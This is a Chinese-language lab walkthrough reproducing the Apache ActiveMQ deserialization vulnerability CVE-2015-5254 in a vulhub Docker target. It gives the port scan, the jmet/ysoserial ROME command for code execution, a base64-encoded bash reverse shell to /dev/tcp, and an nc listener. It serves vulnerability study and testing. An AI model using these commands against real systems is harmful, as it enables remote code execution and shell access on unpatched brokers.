ActiveMQ 反序列化漏洞（CVE-2015-5254）

漏洞描述

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

漏洞原理

影响版本

Apache ActiveMQ 5.13.0之前的5.x版本

漏洞复现

开启靶机

cd vulhub/activemq/CVE-2015-5254/

docker-compose up -d

查看IP

ifconfig

查看端口

docker ps

信息收集

使用nmap工具进行对网站服务的端口扫描

nmap -sS -T5 -n -p- 192.168.9.151

通过扫描发现开启61616端口

然后使用这个反序列化工具

git clone  git://github.com/Ma1Dong/ActiveMQ_CVE-2015-5254.git

使用jmet进行漏洞利用。首先下载jmet的jar文件，并在同目录下创建一个external文件夹（防止爆文件夹不存在的错误）。

jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再自己下载），所以我们需要在ysoserial是gadget中选择一个可以使用的，比如ROME。

执行：

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.9.151 61616

解释一下这个命令的意思：

调用java -jar 运行 jmet的jar包，-Q是插入一个名为event的队列，-I 是选择装载ActiveMQ模块 -s 是选择ysoserial payload -Y 是攻击模式和内容 -Yp 是选择攻击利用链，这是选择是ROME， 之后带上IP加端口。

-Q 比如我修改event为ljw 就成功插入一个名为ljw的队列。

http://192.168.198.135:8161/admin/browse.jsp?JMSDestination=ljw

就可以看到我插入的队伍

点击查看这条消息即可触发命令执行，此时进入容器docker-compose exec activemq bash，可见/tmp/success已成功创建，说明漏洞利用成功：

最后反弹shell就可以了

bash -i >& /dev/tcp/192.168.198.132/7777 0>&1

经过base64加密：

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5OC4xMzIvNzc3NyAwPiYx

将命令替换成弹shell语句再利用：

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5OC4xMzIvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.198.135 61616

要回之前的页面点一下

最后设置监听，就可以了

nc -lvp 7777

删除靶机

docker-compose down -v